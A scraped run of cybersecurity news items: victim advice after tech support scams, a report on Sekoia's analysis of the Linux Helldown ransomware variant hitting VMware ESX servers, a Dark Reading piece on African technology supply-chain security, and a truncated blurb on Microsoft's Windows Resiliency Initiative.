Despite the occasional arrests and FTC fines for tech support scammers and their henchmen, there are still plenty of cybercriminals active in this field. Scams range from unsolicited calls offering help with your “infected” computer to fully-fledged websites where you can purchase heavily over-priced versions of legitimate security software.

Unfortunately for some people these warnings may have come too late. So what should you do if you have fallen victim to a tech support scam? Here are a few pointers:

*   Have you already paid? Contact your credit card company or bank and let them know what’s happened. You may also need to file a complaint with the FTC or contact your local law enforcement agency, depending on your region.
*   If you’ve shared your password with a scammer, change it on every account that uses this password. Consider using a password manager and enable 2FA for important accounts.
*   Scan your device. If scammers have had access to your system, they may have planted a backdoor so they can revisit whenever they feel like it. Malwarebytes can remove backdoors and other software left behind by scammers.
*   Keep an eye out for unexpected payments. Be on the lookout for suspicious charges/payments on your credit cards and bank accounts so you can revert and stop them.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 “Sad announcement” email leads to tech support scam 

Cybersecurity firm Sekoia has discovered a new variant of Helldown ransomware. The article details their tactics and how…

Cybersecurity firm Sekoia has discovered a new variant of Helldown ransomware. The article details their tactics and how they exploit vulnerabilities in network devices, steal sensitive data, and encrypt critical systems.

Sekoia’s cybersecurity researchers have discovered a Linux variant of the new ransomware strain, Helldown, first **found** by Halcyon and deploys Windows ransomware derived from the LockBit 3.0 code. 

Helldown is a relatively new ransomware group that has been actively targeting organizations since August 2024, affecting over 30 firms in three months. This threat actor primarily exploits vulnerabilities in network devices, particularly **Zyxel firewalls**.

Once they gain access, they employ a double extortion strategy, encrypting critical data and threatening to leak sensitive information if a ransom is not paid. Researchers suspect that the group is expanding its attacks to target virtualized infrastructures via VMware, “given the recent development of ransomware targeting ESX.” 

Helldown’s Linux variant specifically targets VMware ESX servers. This variant was first spotted by cybersecurity researcher Alex Turing (**@TuringAlex**) on 31 October 2024. 

According to Sekoia’s blog post shared with Hackread.com, the ransomware’s code focuses on a sample of VMware ESX servers and is straightforward, lacking obfuscation and anti-debugging mechanisms. The main function executes a simple workflow, including configuration loading, file search, encryption, and ransom note creation.

The code also includes a function called kill\_vms, which lists and kills VMs sequentially. Terminating VMs before encryption grants ransomware write access to image files, but static and dynamic analysis shows this functionality is not invoked, indicating that the ransomware is still under development or not that advanced.

On its dark web data leak site, the group has disclosed a large amount of data, ranging from 22GB to 431GB, and averaging 70GB excluding outliers. The stolen files are mostly PDFs or scanned documents, likely obtained from servers like NAS systems or electronic document management portals. The large volume suggests the attacker targets data sources storing administrative files, which typically contain sensitive information.

Helldown ransomware’s ransom note and dark web leak site.

Researchers suspect a connection between Helldown vs. Hellcat and Darkrace/Donex groups, due to the timing of a company (Schneider Electric) compromise and social media activity by alleged Hellcat operators. However, no technical similarities have been found between these groups so far. 

> _“Two accounts on the X social media, @grepcn and @ReyBreached, claiming to be Hellcat operators, posted to distinguish themselves from Helldown, each displaying Hellcat’s DLS link in their profiles.”_
> 
> Sekoia’s Threat Detection & Research (TDR) team

For your information, @grepcn has been quite active on Breach Forums. They are also the hacker behind recent data breaches involving Dell (**1, 2, 3**) and **Twilio**.

It is also worth noting, though, that Helldown shares behavioural similarities with Darkrace, as both likely originated from leaked LockBit 3 code, and is suspected to be a rebrand of Darkrace.

Nevertheless, to protect against the Helldown attack, organizations should patch their network devices, particularly Zyxel firewalls, with the latest security updates. Adopting crucial security measures like network segmentation, access controls, and regular backups, and educating employees on cybersecurity best practices, including phishing awareness and secure password usage is essential to address evolving ransomware threats proactively.

**Jason Soroko**, Senior Fellow at Sectigo, a Scottsdale, Arizona-based provider of comprehensive certificate lifecycle management (CLM) weighed on in the latest development stating that Helldown ransomware represents a sophisticated evolution of modern malware.

_“_Helldown is a prime example of how cybercriminals are piecing together all of the elements of modern malware to create a formidable threat. All of the elements of this malware variant have been seen before, but we are increasingly seeing malware that is strengthening on all fronts,_“_ Jason explained.

He added that security teams must design protection assuming adversaries will use advanced, well-crafted techniques, rather than relying on flaws or oversights by attackers to mitigate threats.

_“_From fileless execution to strong custom encryption, this malware variant teaches us that we can’t rely on our adversaries to make mistakes that give us an easy way to mitigate their attacks. Security architects who are building defensive systems against attacks such as this should assume that adversaries are bringing a sophisticated set of tools with few weak spots._“_

1.  **Telegram-Controlled TgRat Trojan Targets Linux Servers**
2.  **Hackers Deploy Linux FASTCash Malware for ATM Cashouts**
3.  **Play Ransomware Variant Targeting Linux ESXi Environments**
4.  **AcidRain Linux Malware Variant “AcidPour” Targeting Ukraine**
5.  **Linux Malware ‘Perfctl’ Hits Millions by Mimicking System Files**

Linux Variant of Helldown Ransomware Targets VMware ESX Servers

Recent backdoor implants and cyber-espionage attacks on their supply chains have African organizations looking to diversify beyond Chinese, American tech vendors.

Source: CG Alex via Shutterstock

Every night for five years, computers and network appliances from the headquarters of the African Union in Ethiopia — a facility built by Chinese firms — reportedly reached out to China-based systems and uploaded sensitive data. The espionage through the technology supply chain, which China's government denies, undermined the security of the pan-African organization.

The incident and more recent supply-chain breaches have underscored that reliance on foreign technological supply chains carries with it significant risks. While using a technology supply chain anchored in China was seen as a less constrained option than US and European options, the truth is that African nations need to evaluate the security of all their supply chains across applications, consumer devices, infrastructure, and service providers, according to a report published by the Africa Center for Strategic Studies, a research and academic center funded by the US Department of Defense.

"I don't think there's an African country that doesn't have some kind of interest in fostering a more robust technology industry and finding various ways to exert more ownership and agency over various aspects of the technology sector," says Nate Allen, associate professor at the Africa Center for Strategic Studies and the author of the report. "You are seeing increasing African interest in having more ownership and say over their technology supply chains."

Supply-chain security has become a major issue worldwide following malicious events, such as the WannaCry and NotPetya worms and the compromise of SolarWinds, as well as IT supply-chain failures, like this summer's CrowdStrike outage. The US government has voiced concerns over the extent to which US maritime ports are reliant on Chinese equipment and investment, and China has begun creating its own operating system and software ecosystem.

Similarly, African nations have become wary of information technology supplied by any number of foreign countries, including China, Russia, the US, and Europe. While African nations need the technology and investment, they are pursuing initiatives to reduce their reliance, says Mark Walker, vice president of data and analytics for the Middle East, Turkey, and Africa for IDC South Africa.

"The reality is that we live in a multidimensional, globally interconnected world, \[where\] development is reliant on significant capital investment and R&D to develop technology — often this is in limited supply across Africa," he says. "That said, many African nations are focusing on developing local software and technology skills in their populations to offset reliance on global players and also ensure that solutions are relevant to local market condition and needs. Education plays a significant role in this."

**China, US Dominate Africa's Tech Market**

Those efforts are still nascent, with the reality that the top technology suppliers in Africa come from China and the US. In mobile applications, for example, 36 of 2023's top-100 applications are from Chinese companies, while 23 are from US companies, according to a report from DataSparkle, a provider of data and analytics for emerging markets. Africa-based developers only account for only seven applications, mostly focused on digital cash and payment applications.

The US dominates the operating-system supply chain with Microsoft's Windows, Google's Android, and Apple's iOS dominating the field.

"If you're not China and you're not the United States, you just have a lot of dependencies in your technology supply chain, and there's no way around it — even to some extent, if you are China and the United States," ACSS's Allen says.

Yet, the 54 nations on the content have options. While foreign firms provide much of the technology, the African market continues to grow and the domestic technology sector continues to have the most insight into nation-by-nation needs.

"\[A\] detailed view of Africa’s technology sector reveals that it is not under the control of any one actor, and there are plenty of opportunities for Africans to assert agency," the ACSS report stated. "By further fostering diversity and competition within the tech sector, African governments can help mitigate the vulnerabilities that come from external actor influence."

**Future of Technology Supply Chains in Africa**

Companies entering the market should find ways to address the cybersecurity concerns of African customers, because if they don't, someone else will, says IDC South Africa's Walker.

"Competition is strong, and vendors are judged on their ability to supply relevant technologies and services at a fair price with solid \[local\] support structures," he says, adding that companies should understand "the local market dynamics, including economic and political realities and the local regulatory environments. Security issues faced in the Horn of Africa around Somalia are different to those faced in northern Nigeria and the Magreb, which again, differ significantly from southeast Africa."

Among incidents in Africa, Chinese hackers targeted Kenyan officials following the nation's trouble paying back loans from China, according to news reports published in 2023, while another incident involved a state-sponsored group targeting foreign-affairs ministries, embassies, and military forces in Africa in an operation dubbed Diplomatic Specter, according to a threat analysis published in May.

In addition, African officials have warned that an important technology supply chain for the continent — open-source software (OSS) — needs to be better secured to prevent malicious attacks.

"I don't think that Africans are naive, or any government around the world is naive — I think they know that, if you are being sold a technology product that is not domestically produced, then there's always going to be some kind of security risk there," says ACSS's Allen. "I think the question is, how can you mitigate that security risk?"

Companies working in the markets need to have an answer to that question, he says.

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

African Reliance on Foreign Suppliers Boosts Insecurity Concerns

Microsoft has announced a new Windows Resiliency Initiative as a way to improve security and reliability, as well as ensure that system integrity is not compromised.
The idea, the tech giant said, is to avoid incidents like that of CrowdStrike's earlier this July, enable more apps and users to be run without admin privileges, add controls surrounding the use of unsafe apps and drivers, and offer

Tag

#windows